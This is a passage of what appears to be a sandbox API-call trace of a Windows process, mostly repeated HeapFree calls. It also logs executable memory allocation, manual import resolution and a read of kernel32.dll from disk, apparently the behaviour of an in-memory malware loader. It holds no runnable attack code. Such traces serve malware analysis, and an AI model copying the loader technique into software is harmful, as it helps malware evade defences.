hHeap=0x4f0000, dwFlags=0x0, lpMem=0x255c7a0 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x256f9b0 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2582bc0 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x25a0080 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x25b3290 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x25c64a0 | out: hHeap=0x4f0000) returned 1 [0094.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x25d96b0 | out: hHeap=0x4f0000) returned 1 [0094.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x25ec8c0 | out: hHeap=0x4f0000) returned 1 [0094.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x25ffad0 | out: hHeap=0x4f0000) returned 1 [0094.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2612ce0 | out: hHeap=0x4f0000) returned 1 [0094.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2625ef0 | out: hHeap=0x4f0000) returned 1 [0094.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2639100 | out: hHeap=0x4f0000) returned 1 [0094.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x264c310 | out: hHeap=0x4f0000) returned 1 [0094.267] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x265f520 | out: hHeap=0x4f0000) returned 1 [0094.269] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2672730 | out: hHeap=0x4f0000) returned 1 [0094.269] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2685940 | out: hHeap=0x4f0000) returned 1 [0094.269] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2698b50 | out: hHeap=0x4f0000) returned 1 [0094.272] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x26abd60 | out: hHeap=0x4f0000) returned 1 [0094.272] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x26bef70 | out: hHeap=0x4f0000) returned 1 [0094.272] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x26d2180 | out: hHeap=0x4f0000) returned 1 [0094.272] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x26e5390 | out: hHeap=0x4f0000) returned 1 [0094.272] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x26f85a0 | out: hHeap=0x4f0000) returned 1 [0094.273] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x270b7b0 | out: hHeap=0x4f0000) returned 1 [0094.273] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x271e9c0 | out: hHeap=0x4f0000) returned 1 [0094.273] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2731bd0 | out: hHeap=0x4f0000) returned 1 [0094.273] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2744de0 | out: hHeap=0x4f0000) returned 1 [0094.273] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2757ff0 | out: hHeap=0x4f0000) returned 1 [0094.273] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x276b200 | out: hHeap=0x4f0000) returned 1 [0094.273] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x277e410 | out: hHeap=0x4f0000) returned 1 [0094.273] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2791620 | out: hHeap=0x4f0000) returned 1 [0094.273] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x27a4830 | out: hHeap=0x4f0000) returned 1 [0094.279] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x27b7a40 | out: hHeap=0x4f0000) returned 1 [0094.279] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x27cac50 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x27dde60 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x27f1070 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2804280 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2817490 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x282a6a0 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x283d8b0 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2850ac0 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2863cd0 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2876ee0 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x288a0f0 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x289d300 | out: hHeap=0x4f0000) returned 1 [0094.280] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x28b0510 | out: hHeap=0x4f0000) returned 1 [0094.286] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x28c3720 | out: hHeap=0x4f0000) returned 1 [0094.286] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x28d6930 | out: hHeap=0x4f0000) returned 1 [0094.286] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x28e9b40 | out: hHeap=0x4f0000) returned 1 [0094.286] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x28fcd50 | out: hHeap=0x4f0000) returned 1 [0094.288] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x290ff60 | out: hHeap=0x4f0000) returned 1 [0094.289] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2923170 | out: hHeap=0x4f0000) returned 1 [0094.289] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2936380 | out: hHeap=0x4f0000) returned 1 [0094.289] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2949590 | out: hHeap=0x4f0000) returned 1 [0094.289] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x295c7a0 | out: hHeap=0x4f0000) returned 1 [0094.289] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x296f9b0 | out: hHeap=0x4f0000) returned 1 [0094.289] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2982bc0 | out: hHeap=0x4f0000) returned 1 [0094.289] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2995dd0 | out: hHeap=0x4f0000) returned 1 [0094.289] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x29a8fe0 | out: hHeap=0x4f0000) returned 1 [0094.290] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x29bc1f0 | out: hHeap=0x4f0000) returned 1 [0094.295] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x29cf400 | out: hHeap=0x4f0000) returned 1 [0094.295] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x29e2610 | out: hHeap=0x4f0000) returned 1 [0094.295] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x29f5820 | out: hHeap=0x4f0000) returned 1 [0094.295] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2a08a30 | out: hHeap=0x4f0000) returned 1 [0094.295] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2a1bc40 | out: hHeap=0x4f0000) returned 1 [0094.297] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2a2ee50 | out: hHeap=0x4f0000) returned 1 [0094.298] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2a42060 | out: hHeap=0x4f0000) returned 1 [0094.298] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2a55270 | out: hHeap=0x4f0000) returned 1 [0094.298] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2a68480 | out: hHeap=0x4f0000) returned 1 [0094.299] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2a7b690 | out: hHeap=0x4f0000) returned 1 [0094.299] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2a8e8a0 | out: hHeap=0x4f0000) returned 1 [0094.299] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2aa1ab0 | out: hHeap=0x4f0000) returned 1 [0094.299] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2ab4cc0 | out: hHeap=0x4f0000) returned 1 [0094.299] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2ac7ed0 | out: hHeap=0x4f0000) returned 1 [0094.455] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2adb0e0 | out: hHeap=0x4f0000) returned 1 [0094.455] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2aee2f0 | out: hHeap=0x4f0000) returned 1 [0094.455] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2b01500 | out: hHeap=0x4f0000) returned 1 [0094.455] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2b14710 | out: hHeap=0x4f0000) returned 1 [0094.455] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2b27920 | out: hHeap=0x4f0000) returned 1 [0094.455] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2b3ab30 | out: hHeap=0x4f0000) returned 1 [0094.458] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2b4dd40 | out: hHeap=0x4f0000) returned 1 [0094.460] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2b60f50 | out: hHeap=0x4f0000) returned 1 [0094.460] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2b74160 | out: hHeap=0x4f0000) returned 1 [0094.460] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2b87370 | out: hHeap=0x4f0000) returned 1 [0094.460] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2b9a580 | out: hHeap=0x4f0000) returned 1 [0094.460] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2bad790 | out: hHeap=0x4f0000) returned 1 [0094.460] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2bc09a0 | out: hHeap=0x4f0000) returned 1 [0094.460] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2bd3bb0 | out: hHeap=0x4f0000) returned 1 [0094.466] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2be6dc0 | out: hHeap=0x4f0000) returned 1 [0094.466] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2bf9fd0 | out: hHeap=0x4f0000) returned 1 [0094.466] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2c0d1e0 | out: hHeap=0x4f0000) returned 1 [0094.466] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2c203f0 | out: hHeap=0x4f0000) returned 1 [0094.466] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2c33600 | out: hHeap=0x4f0000) returned 1 [0094.467] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2c46810 | out: hHeap=0x4f0000) returned 1 [0094.471] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2c59a20 | out: hHeap=0x4f0000) returned 1 [0094.472] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2c6cc30 | out: hHeap=0x4f0000) returned 1 [0094.472] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2c7fe40 | out: hHeap=0x4f0000) returned 1 [0094.472] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2c93050 | out: hHeap=0x4f0000) returned 1 [0094.472] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2ca6260 | out: hHeap=0x4f0000) returned 1 [0094.472] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2cb9470 | out: hHeap=0x4f0000) returned 1 [0094.472] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2ccc680 | out: hHeap=0x4f0000) returned 1 [0094.472] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2cdf890 | out: hHeap=0x4f0000) returned 1 [0094.477] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2cf2aa0 | out: hHeap=0x4f0000) returned 1 [0094.477] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2d05cb0 | out: hHeap=0x4f0000) returned 1 [0094.477] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2d18ec0 | out: hHeap=0x4f0000) returned 1 [0094.477] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2d2c0d0 | out: hHeap=0x4f0000) returned 1 [0094.477] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2d3f2e0 | out: hHeap=0x4f0000) returned 1 [0094.480] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2d524f0 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2d65700 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2d78910 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2da0080 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2db3290 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2dc64a0 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2dd96b0 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2dec8c0 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2dffad0 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2e12ce0 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2e25ef0 | out: hHeap=0x4f0000) returned 1 [0094.481] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2e39100 | out: hHeap=0x4f0000) returned 1 [0094.634] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2e4c310 | out: hHeap=0x4f0000) returned 1 [0094.636] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2e5f520 | out: hHeap=0x4f0000) returned 1 [0094.636] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2e72730 | out: hHeap=0x4f0000) returned 1 [0094.636] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2e85940 | out: hHeap=0x4f0000) returned 1 [0094.636] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2e98b50 | out: hHeap=0x4f0000) returned 1 [0094.640] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2eabd60 | out: hHeap=0x4f0000) returned 1 [0094.640] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2ebef70 | out: hHeap=0x4f0000) returned 1 [0094.640] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2ed2180 | out: hHeap=0x4f0000) returned 1 [0094.640] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2ee5390 | out: hHeap=0x4f0000) returned 1 [0094.640] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2ef85a0 | out: hHeap=0x4f0000) returned 1 [0094.640] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2f0b7b0 | out: hHeap=0x4f0000) returned 1 [0094.643] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2f1e9c0 | out: hHeap=0x4f0000) returned 1 [0094.644] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2f31bd0 | out: hHeap=0x4f0000) returned 1 [0094.644] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2f44de0 | out: hHeap=0x4f0000) returned 1 [0094.644] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2f57ff0 | out: hHeap=0x4f0000) returned 1 [0094.644] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2f6b200 | out: hHeap=0x4f0000) returned 1 [0094.644] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2f7e410 | out: hHeap=0x4f0000) returned 1 [0094.644] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2f91620 | out: hHeap=0x4f0000) returned 1 [0094.644] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2fa4830 | out: hHeap=0x4f0000) returned 1 [0094.649] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2fb7a40 | out: hHeap=0x4f0000) returned 1 [0094.649] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2fcac50 | out: hHeap=0x4f0000) returned 1 [0094.650] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2fdde60 | out: hHeap=0x4f0000) returned 1 [0094.651] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2ff1070 | out: hHeap=0x4f0000) returned 1 [0094.651] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x3004280 | out: hHeap=0x4f0000) returned 1 [0094.651] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x3017490 | out: hHeap=0x4f0000) returned 1 [0094.651] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x302a6a0 | out: hHeap=0x4f0000) returned 1 [0094.651] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x303d8b0 | out: hHeap=0x4f0000) returned 1 [0094.651] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x3050ac0 | out: hHeap=0x4f0000) returned 1 [0094.651] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x3063cd0 | out: hHeap=0x4f0000) returned 1 [0094.651] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x3076ee0 | out: hHeap=0x4f0000) returned 1 [0094.651] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x308a0f0 | out: hHeap=0x4f0000) returned 1 [0094.656] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x309d300 | out: hHeap=0x4f0000) returned 1 [0094.658] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x30b0510 | out: hHeap=0x4f0000) returned 1 [0094.661] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x30c3720 | out: hHeap=0x4f0000) returned 1 [0097.701] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0097.704] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0097.705] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0097.707] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0097.707] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0097.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0097.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0097.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0097.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0097.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0097.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0097.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0097.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0097.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0097.708] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0097.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0097.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0097.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0097.709] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0097.709] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0097.709] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0097.709] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0097.709] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0097.709] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0097.709] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0097.710] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0097.710] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0097.710] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51db10 | out: hHeap=0x4f0000) returned 1 [0097.710] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0097.715] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x500970 | out: hHeap=0x4f0000) returned 1 [0097.717] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0097.717] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0097.717] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0097.717] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0097.717] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0097.717] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0097.719] GetProcessHeap () returned 0x4f0000 [0097.720] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x68) returned 0x4f8cd0 [0097.721] GetProcessHeap () returned 0x4f0000 [0097.721] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509170 [0097.721] GetProcessHeap () returned 0x4f0000 [0097.721] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x48) returned 0x500e70 [0097.722] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0097.722] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0097.722] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0097.722] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0097.722] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0097.722] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0097.722] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0097.722] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0097.723] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0097.723] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0097.723] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0097.723] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0097.732] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0097.732] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0097.732] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0097.732] GetProcessHeap () returned 0x4f0000 [0097.732] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xac430) returned 0x51c5c0 [0097.735] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0097.735] ReadFile (in: hFile=0x134, lpBuffer=0x51c5c0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x51c5c0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0097.958] CloseHandle (hObject=0x134) returned 1 [0097.959] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0097.965] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0097.965] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0097.965] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0097.965] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0097.965] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0097.965] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0097.965] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0097.965] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0097.965] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0097.965] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0097.965] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0097.966] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0097.966] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0097.966] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") 